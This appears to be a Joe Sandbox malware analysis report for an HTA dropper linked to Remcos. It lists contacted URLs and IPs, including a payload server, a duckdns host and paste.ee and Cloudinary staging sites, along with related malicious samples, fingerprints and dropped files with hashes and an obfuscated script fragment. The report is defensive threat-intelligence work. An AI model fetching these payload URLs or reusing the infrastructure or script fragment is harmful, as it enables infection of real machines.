http://geoplugin.net/json.gp	CasPol.exe	false		high
https://www.google.com	powershell.exe, 00000008.00000002.2485339671.0000000004557000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.microsoft.co#v	powershell.exe, 00000008.00000002.2521068943.0000000007F00000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.microsoft.covVc	powershell.exe, 00000003.00000002.2252958107.0000000008418000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://res.cloudinary.com	powershell.exe, 00000008.00000002.2485339671.0000000004557000.00000004.00000800.00020000.00000000.sdmp	false		high
https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpgt	powershell.exe, 00000008.00000002.2485339671.0000000004557000.00000004.00000800.00020000.00000000.sdmp	false		high
http://geoplugin.net/json.gp/C	powershell.exe, 00000008.00000002.2485339671.0000000005466000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2521285929.0000000009096000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false		high
https://aka.ms/pscore6lB	powershell.exe, 00000003.00000002.2247409766.0000000004CE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2485339671.0000000004401000.00000004.00000800.00020000.00000000.sdmp	false		high
http://192.210.150.24/55/creamykissinglipsgoodforcreamythingswithcreamicream.tIFsx	powershell.exe, 00000003.00000002.2252958107.00000000083B2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000003.00000002.2247409766.0000000004E38000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/	powershell.exe, 00000008.00000002.2485339671.0000000005466000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 00000003.00000002.2249490766.0000000005D46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2485339671.0000000005466000.00000004.00000800.00020000.00000000.sdmp	false		high
https://analytics.paste.ee;	powershell.exe, 00000008.00000002.2485339671.0000000004557000.00000004.00000800.00020000.00000000.sdmp	false		high
http://192.210.150.24/55/creamykissinglipsgoodforcreamythingswithcreamicream.tIF#p	powershell.exe, 00000003.00000002.2250935390.0000000007465000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdnjs.cloudflare.com	powershell.exe, 00000008.00000002.2485339671.0000000004557000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.microsoft.c	powershell.exe, 00000003.00000002.2250935390.000000000743D000.00000004.00000020.00020000.00000000.sdmp	false		high
https://cdnjs.cloudflare.com;	powershell.exe, 00000008.00000002.2485339671.0000000004557000.00000004.00000800.00020000.00000000.sdmp	false		high
http://192.210.150.24/55/creamykissinglipsgoodforcreamythingswithcreamicream.tIFR	powershell.exe, 00000003.00000002.2252958107.0000000008431000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000003.00000002.2247409766.0000000004CE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2485339671.0000000004401000.00000004.00000800.00020000.00000000.sdmp	false		high
https://secure.gravatar.com	powershell.exe, 00000008.00000002.2485339671.0000000004557000.00000004.00000800.00020000.00000000.sdmp	false		high
https://themes.googleusercontent.com	powershell.exe, 00000008.00000002.2485339671.0000000004557000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
107.173.143.10	newglobalfucntioninside.duckdns.org	United States	36352	AS-COLOCROSSINGUS	false
192.210.150.24	unknown	United States	36352	AS-COLOCROSSINGUS	true
151.101.1.137	cloudinary.map.fastly.net	United States	54113	FASTLYUS	false
104.21.84.67	paste.ee	United States	13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1574256
Start date and time:	2024-12-13 07:37:25 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 49s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	13
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	creamkissingthingswithcreambananapackagecreamy.hta
Detection:	MAL
Classification:	mal100.rans.phis.troj.spyw.expl.evad.winHTA@18/16@6/4
EGA Information:	Successful, ratio: 75%
HCA Information:	Successful, ratio: 100% Number of executed functions: 53 Number of non-executed functions: 183
Cookbook Comments:	Found application associated with file extension: .hta Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 13.107.246.63, 4.245.163.56
Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target mshta.exe, PID 7156 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
01:38:20	API Interceptor	116x Sleep call for process: powershell.exe modified
01:39:29	API Interceptor	3787076x Sleep call for process: CasPol.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
107.173.143.10	Cot90012ARCACONTAL.xls	Get hash	malicious	Remcos	Browse
192.210.150.24	Cot90012ARCACONTAL.xls	Get hash	malicious	Remcos	Browse	192.210.150.24/55/crm/creamkissingthingswithcreambananapackagecreamy.hta
151.101.1.137	Euro confirmation Sp.xls	Get hash	malicious	Unknown	Browse
	stage2.ps1	Get hash	malicious	PureLog Stealer, RevengeRAT, zgRAT	Browse
	nicegirlforyou.hta	Get hash	malicious	Cobalt Strike, Remcos	Browse
	Invoice A037.xls	Get hash	malicious	Unknown	Browse
	Orden_de_Compra_Nmero_6782929219.xls	Get hash	malicious	HTMLPhisher	Browse
	Aktarma,pdf.vbs	Get hash	malicious	Remcos	Browse
	16547.js	Get hash	malicious	MassLogger RAT	Browse
	#U041f#U043b#U0430#U0449#U0430#U043d#U0435.docx	Get hash	malicious	Remcos	Browse
	nr101612_Order.wsf	Get hash	malicious	Remcos	Browse
	1013911.js	Get hash	malicious	FormBook	Browse
104.21.84.67	Order_DEC2024.wsf	Get hash	malicious	Remcos	Browse	paste.ee/d/GXRLA
	nr101612_Order.wsf	Get hash	malicious	Remcos	Browse	paste.ee/d/81FCf
	Doc261124.vbs	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	paste.ee/d/MQJcS
	Chitanta bancara - #113243.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	paste.ee/d/u4bvR
	rdevuelto_Pagos.wsf	Get hash	malicious	AgentTesla	Browse	paste.ee/d/SDfNF
	Product list 0980DF098A7.xls	Get hash	malicious	Unknown	Browse	paste.ee/d/enGXm
	Payment_advice.vbs	Get hash	malicious	Unknown	Browse	paste.ee/d/wXm0Y
	SHREE GANESH BOOK SERVICES-347274.xls	Get hash	malicious	Unknown	Browse	paste.ee/d/eA3FM
	dereac.vbe	Get hash	malicious	Unknown	Browse	paste.ee/d/JZHbW
	P018400.xla.xlsx	Get hash	malicious	Unknown	Browse	paste.ee/d/kmRFs

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
cloudinary.map.fastly.net	Cot90012ARCACONTAL.xls	Get hash	malicious	Remcos	Browse	151.101.129.137
	Euro confirmation Sp.xls	Get hash	malicious	Unknown	Browse	151.101.1.137
	stage2.ps1	Get hash	malicious	PureLog Stealer, RevengeRAT, zgRAT	Browse	151.101.193.137
	nicegirlforyou.hta	Get hash	malicious	Cobalt Strike, Remcos	Browse	151.101.1.137
	invoice09850.xls	Get hash	malicious	Remcos	Browse	151.101.65.137
	Invoice A037.xls	Get hash	malicious	Unknown	Browse	151.101.1.137
	Plugin81139.js	Get hash	malicious	PureLog Stealer, RevengeRAT, zgRAT	Browse	151.101.129.137
	PO-8776-2024.js	Get hash	malicious	Remcos	Browse	151.101.129.137
	New Order Enquiry.js	Get hash	malicious	AgentTesla	Browse	151.101.193.137
	NESTLE_MEXICO_Purchase_Order_10122024.xls	Get hash	malicious	Unknown	Browse	151.101.65.137
newglobalfucntioninside.duckdns.org	Cot90012ARCACONTAL.xls	Get hash	malicious	Remcos	Browse	107.173.143.10
paste.ee	Cot90012ARCACONTAL.xls	Get hash	malicious	Remcos	Browse	188.114.97.6
	SOA USD67,353.35.xla.xlsx	Get hash	malicious	Unknown	Browse	188.114.97.6
	Euro confirmation Sp.xls	Get hash	malicious	Unknown	Browse	188.114.96.6
	print preview.js	Get hash	malicious	FormBook	Browse	172.67.187.200
	nicegirlforyou.hta	Get hash	malicious	Cobalt Strike, Remcos	Browse	104.21.84.67
	nicewithgreatfeaturesreturnformebestthingsgivensoofar.hta	Get hash	malicious	Cobalt Strike, Remcos	Browse	104.21.84.67
	invoice09850.xls	Get hash	malicious	Remcos	Browse	188.114.97.6
	Invoice A037.xls	Get hash	malicious	Unknown	Browse	188.114.97.6
	PO-8776-2024.js	Get hash	malicious	Remcos	Browse	104.21.84.67
	NESTLE_MEXICO_Purchase_Order_10122024.xls	Get hash	malicious	Unknown	Browse	188.114.97.6

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
FASTLYUS	file.exe	Get hash	malicious	Credential Flusher	Browse	151.101.129.91
	file.exe	Get hash	malicious	Credential Flusher	Browse	151.101.129.91
	file.exe	Get hash	malicious	Credential Flusher	Browse	151.101.193.91
	file.exe	Get hash	malicious	Credential Flusher	Browse	151.101.129.91
	http://18.224.21.137/FFmnpShhHMMWeIqsVa2rJ69xinQlZ-7450	Get hash	malicious	Unknown	Browse	151.101.194.137
	file.exe	Get hash	malicious	Credential Flusher	Browse	151.101.129.91
	file.exe	Get hash	malicious	Credential Flusher	Browse	151.101.129.91
	file.exe	Get hash	malicious	Credential Flusher	Browse	151.101.1.91
	file.exe	Get hash	malicious	Credential Flusher	Browse	151.101.193.91
	file.exe	Get hash	malicious	Discord Token Stealer, Millenuim RAT	Browse	185.199.111.133
AS-COLOCROSSINGUS	Cot90012ARCACONTAL.xls	Get hash	malicious	Remcos	Browse	192.210.150.24
	SOA USD67,353.35.xla.xlsx	Get hash	malicious	Unknown	Browse	107.172.44.175
	Euro confirmation Sp.xls	Get hash	malicious	Unknown	Browse	23.95.235.29
	SwiftCopy_PaymtRecpt121224.exe	Get hash	malicious	Remcos	Browse	192.210.150.17
	Document.xla	Get hash	malicious	Unknown	Browse	107.172.44.175
	Document.xla	Get hash	malicious	Unknown	Browse	107.172.44.175
	Document.xla	Get hash	malicious	Unknown	Browse	107.172.44.175
	Document.xla	Get hash	malicious	Unknown	Browse	107.172.44.175
	nicegirlforyou.hta	Get hash	malicious	Cobalt Strike, Remcos	Browse	172.245.142.60
	nicewithgreatfeaturesreturnformebestthingsgivensoofar.hta	Get hash	malicious	Cobalt Strike, Remcos	Browse	192.3.101.149
AS-COLOCROSSINGUS	Cot90012ARCACONTAL.xls	Get hash	malicious	Remcos	Browse	192.210.150.24
	SOA USD67,353.35.xla.xlsx	Get hash	malicious	Unknown	Browse	107.172.44.175
	Euro confirmation Sp.xls	Get hash	malicious	Unknown	Browse	23.95.235.29
	SwiftCopy_PaymtRecpt121224.exe	Get hash	malicious	Remcos	Browse	192.210.150.17
	Document.xla	Get hash	malicious	Unknown	Browse	107.172.44.175
	Document.xla	Get hash	malicious	Unknown	Browse	107.172.44.175
	Document.xla	Get hash	malicious	Unknown	Browse	107.172.44.175
	Document.xla	Get hash	malicious	Unknown	Browse	107.172.44.175
	nicegirlforyou.hta	Get hash	malicious	Cobalt Strike, Remcos	Browse	172.245.142.60
	nicewithgreatfeaturesreturnformebestthingsgivensoofar.hta	Get hash	malicious	Cobalt Strike, Remcos	Browse	192.3.101.149
CLOUDFLARENETUS	https://link.mail.beehiiv.com/ls/click?upn=u001.R74aO5UQ-2FrUOGP4XJV77OKQT1NAU9BwQ6OP1zvOna2j3qRTjcdTYAqprTXNbU1vrKPOdnlpDlbO1ohrNKAkzUmdLI4l19yBq8cKvYb8dsNKK6IsO0404WADpCgMHJK-2BM7ePj1I7t27EBUyeaiqRuwqngyTjrFDMwzKEm6VF8ExY0iFbvMWKjDk4Y7upRdq5sSY4nXTsFeij7Q5E2ydkS65V1Y39RLDjY80Udth17NgVFYK9r3RCAH09UYk2CIjxFd5I9_j6TOopR0rmB-2FAe-2FAtMIxxpgCP1uVymDZ2Ai3kvTmy94R9Cva2dqhTbcrX0jwqqIbWEZoY75Qxv0d-2Fi-2BJ58G8TpFK32hJ3Y6KvVmw024fgWikUvw7JSpe1p1AxJouHIwzH-2B4WSy6DMsQxGcoT2TOfGxh3ObD4vtK9CAXwy7Cjhf2-2FwG571nv3bia-2F44CMLr9lsCQcs3SwvYIDQ24Nq6VfvIfUFJ9nNyI7I5MS5J8-2Bg5rLnAjlWoLmJBScJaNhqffuqYHWE3BYOKju8i7o1wD6Pw-2Fs92sFC2Mh7Oi9oheY1ZKD714qAu5jG5ZYhyhfMgCcuyNvp15ZI4Srd3AOfDL686JQJNBXoqAuLGHc3y6muY0dxN9oNJrp8vksovnjs-2Be8S30MoUUfcAPp8UPZjIomKd3EBkrVIa3k8AgkBS-2BZFp3F1x23PdTLWCU-2BZmxkQxWt	Get hash	malicious	Unknown	Browse	104.21.90.56
	https://link.mail.beehiiv.com/ls/click?upn=u001.8ULyQR0JYqJFmtAcEKOwZJrtx6Pg-2FFIdL75Xr8cQplPy1BwMP6K04UCj8Y6BqsqIO5QCbkskm97LegF2duW8h-2B7y0wF2E-2BDZNcbzCPIVszT1GD6EOVy0YRZV55MI3rlD0kPZAiaJ0IK1-2FMU2lgPk2Kii32mX86fkDuIDK9GPx4-2FfuyI6JAqdMrtQqIbvs2W-2F-2BIG8MDRxPU9Yn0AWIxVL0SnsGrwak4PiVtMHHZHgth0QvNVoRM6ZTwXBytJNkde3jx-2F-2Fb-2FvT1Ap71VQ1QzJzKA-3D-3DWb3t_K8Qrv2qBC50DA374Af0scmFKIlSM-2Bv5ewezTCdQ-2FHdeUjmHtY3NrJD1TBTC8B4zB5HyIT-2F4sQexLT4eDcDNpHTw1Uv6zyerCF2l6Qv2QnUXIFi1vgFIVZbyXm-2Fb4OHwN5YbpoyTJNqIBeZHgSrlo7M6ZizbyF9nigOzGQDcMUgYHM7Aiblgmi6ZZqeS-2F4eQTcSMrquYcXkgDnpAgjrAXvqys7q9tGDujdSY7rWu7e2v-2B8ZqylkvKbnTnsoe7xpWX2CCdK7-2Ffs69cITr47FLMcG63ztEATsgzr65zgaz1vTV637p-2F932w2jeo6Q6M5CBc8nQ-2BvnbtLXdWgwvebkWZFeKaDHxfFr3YWnPUF1sWMZ4N238r82opSIcsBiifBW-2Fr-2FX6QykqaNBEmm5OGxvGQOo2rDQ3a45-2FO4v08XQIdNTDu5CkpvASiHt5MqJZ9OHD4	Get hash	malicious	Unknown	Browse	104.21.90.56
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	104.21.35.43
	http://18.224.21.137/FFmnpShhHMMWeIqsVa2rJ69xinQlZ-7450	Get hash	malicious	Unknown	Browse	172.67.196.220
	https://grupoescobar.com.br/AA/auth.html#yk.cho@hdel.co.kr	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	file.exe	Get hash	malicious	Amadey, LummaC Stealer, Stealc, Vidar, Xmrig	Browse	172.67.139.78
	CMR ART009.docx	Get hash	malicious	Unknown	Browse	104.21.34.183
	CMR ART009.docx	Get hash	malicious	Unknown	Browse	104.21.34.183
	http://sourceforge.net/projects/nircmd/files/nircmd-x64.zip/download	Get hash	malicious	Unknown	Browse	104.18.5.227
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, Xmrig	Browse	104.21.79.7

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	file.exe	Get hash	malicious	Discord Token Stealer, Millenuim RAT	Browse	104.21.84.67 151.101.1.137
	Ziraat Bankasi Swift Mesaji.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.84.67 151.101.1.137
	ShareGate.24.12.1.msi	Get hash	malicious	Unknown	Browse	104.21.84.67 151.101.1.137
	http://mavenclinic.quatrix.it	Get hash	malicious	Unknown	Browse	104.21.84.67 151.101.1.137
	c2.hta	Get hash	malicious	XWorm	Browse	104.21.84.67 151.101.1.137
	Hydra.ccLoader.bat	Get hash	malicious	Unknown	Browse	104.21.84.67 151.101.1.137
	4JwhvqLe8n.exe	Get hash	malicious	Remcos	Browse	104.21.84.67 151.101.1.137
	full.exe	Get hash	malicious	Quasar	Browse	104.21.84.67 151.101.1.137
	fIPSLgT0lO.exe	Get hash	malicious	Remcos	Browse	104.21.84.67 151.101.1.137
	hoTwj68T1D.exe	Get hash	malicious	Unknown	Browse	104.21.84.67 151.101.1.137

Dropped Files

⊘No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\creamykissinglipsgoodforcreamythingswithcreamicream[1].tiff

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-16, little-endian text, with very long lines (3221), with CRLF line terminators
Category:	dropped
Size (bytes):	153904
Entropy (8bit):	3.7916333313217825
Encrypted:	false
SSDEEP:	3072:gyGYXHM6cErfuTpT7BgyGYXHM6cErfuTpT1gyGYXHM6cErfuTpT7:7GErSN7B7GErSN17GErSN7
MD5:	716D2EDD830102BBBAD2CB0A1A0259F1
SHA1:	720D2DB1E6C8162F89376D06F149237AD8269297
SHA-256:	5A110B1E0B3424A297618863FFA88A2DE1F09C266687F93DA8E3D7C6DAB48341
SHA-512:	EDC3624E8071E058981BF47598B654321846A4538D4F64826457108431584021CA901C16278AB74775EF64A377387427A03CD4592B711F624C463BCDB53986CA
Malicious:	false
Preview:	...... . . . .....W.O.i.K.t.G.C.e.K.u.h.I.k.i.A. .=. .".d.R.q.n.d.r.W.o.a.W.i.W.K.z.O.".....P.x.k.m.h.A.s.B.t.K.W.K.I.L.h. .=. .".L.k.h.e.I.Q.U.W.W.A.e.Q.z.U.K.".....c.A.O.k.K.j.x.m.L.K.m.k.G.c.T. .=. .".e.Z.G.K.U.m.G.q.U.C.i.G.K.a.i.".........i.K.G.b.j.f.S.p.Z.L.W.J.j.p.m. .=. .".G.c.a.W.K.u.b.g.g.n.G.L.C.P.p.".....O.s.f.L.i.i.W.I.L.u.K.c.n.k.S. .=. .".U.A.c.p.i.d.i.k.K.J.W.h.h.W.m.".....e.f.K.q.p.i.L.f.h.K.L.A.h.c.P. .=. .".m.z.W.U.h.W.Z.z.o.t.p.B.O.W.K.".....e.I.f.e.q.o.L.B.N.Z.K.N.b.d.G. .=. .".J.P.W.a.G.q.C.A.G.N.H.h.p.Z.k.".....k.A.x.g.n.b.i.L.n.z.G.R.c.v.S. .=. .".o.B.W.C.Z.N.u.G.h.p.z.c.f.H.c.".....G.k.U.z.b.L.B.f.Q.z.N.p.f.L.L. .=. .".b.O.i.N.p.L.U.A.h.u.K.f.G.b.c.".....W.p.e.e.i.j.J.i.N.L.C.a.k.a.G. .=. .".W.q.L.p.U.P.a.i.W.K.j.W.d.N.i.".....U.a.K.r.K.W.i.p.O.Z.x.o.o.B.s. .=. .".z.W.A.c.L.U.r.m.z.I.L.e.m.O.U.".....G.k.P.N.G.f.z.z.a.i.t.O.i.L.n. .=. .".q.r.L.A.k.W.U.b.L.g.b.a.i.L.G.".....A.B.j.T.f.j.C.P.W.l.h.u.s.a.U. .=. .".W.L.P.b.U.h.K.K.i.N.S.L.A.U.H.".....m.G.e.K.f.d.t.d.

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	5829
Entropy (8bit):	4.901113710259376
Encrypted:	false
SSDEEP:	96:ZCJ2Woe5H2k6Lm5emmXIGLgyg12jDs+un/iQLEYFjDaeWJ6KGcmXlQ9smpFRLcUn:Uxoe5HVsm5emdQgkjDt4iWN3yBGHVQ9v
MD5:	7827E04B3ECD71FB3BD7BEEE4CA52CE8
SHA1:	22813AF893013D1CCCACC305523301BB90FF88D9
SHA-256:	5D66D4CA13B4AF3B23357EB9BC21694E7EED4485EA8D2B8C653BEF3A8E5D0601
SHA-512:	D5F6604E49B7B31C2D1DA5E59B676C0E0F37710F4867F232DF0AA9A1EE170B399472CA1DF0BD21DF702A1B5005921D35A8E6858432B00619E65D0648C74C096B
Malicious:	false
Preview:	PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	1144
Entropy (8bit):	5.290848674040258
Encrypted:	false
SSDEEP:	24:32gSKco4KmBs4RPT6BmFoUebIKomjKcmZ9t7J0gt/NKM9r8Hd:GgSU4y4RQmFoUeWmfmZ9tK8NF9u
MD5:	374272AB01A3AD6B586FC209D47F884D
SHA1:	8C785EB3C085C24C140A197D553DE29B3AF5628A
SHA-256:	FEEC1C388B6D48779BD53FDC17D19CCFBABF759B59C84DAC3DA1B6D3D1376981
SHA-512:	4266E69AA211B66EC5E5BF649C75D9D136B735B41FDEC089EA61919DC3E93A2FC7A4B274A313234AE813F0DA7DA16EB3236039C77A7A66DC00AFFE26990790B3
Malicious:	false
Preview:	@...e...........................................................@...............(..o...B.Rb&............Microsoft.VisualBasic...H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...\|...........System.ConfigurationH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Commands.Utility...

C:\Users\user\AppData\Local\Temp\RES5305.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
File Type:	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x496, 9 symbols, created Fri Dec 13 07:46:06 2024, 1st section name ".debug$S"
Category:	dropped
Size (bytes):	1340
Entropy (8bit):	4.000648188505196
Encrypted:	false
SSDEEP:	24:HfiK9oVaO5eaHuwKcjmfwI+ycuZhNCakSaPNnqSed:/wIwtK2mo1ulCa3WqS+
MD5:	93C5AF888DB008D12101559289AB1775
SHA1:	FFDB67D4BD5A4A142DC3723FC548DC8D64976DE4
SHA-256:	F6ACE27A9424C331536B5AB358C65D5DB6A094C1DC474C2BE56F7229DEF82AA6
SHA-512:	3133A9AC880D0AAD805A8E32B958E489BD1C02447E64BE305BF361E638D10CB23128725EF4AE3041D448AC9A42E312A353F25242C7210AF7007B4836D08BFF2A
Malicious:	false
Preview:	L...>.[g.............debug$S........X...................@..B.rsrc$01........X.......<...........@..@.rsrc$02........P...F...............@..@........W....c:\Users\user\AppData\Local\Temp\yy1wu0jg\CSCCF35FBE9A0D8429B84CE9BA7B3CB93B6.TMP..................a..%...m?....2..........7.......C:\Users\user\AppData\Local\Temp\RES5305.tmp.-.<....................a..Microsoft (R) CVTRES._.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...y.y.1.w.u.0.j.g...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1hvt41ye.tww.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3cslcw35.xnr.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bwgcr51h.r4z.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h32sb4bf.d3o.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
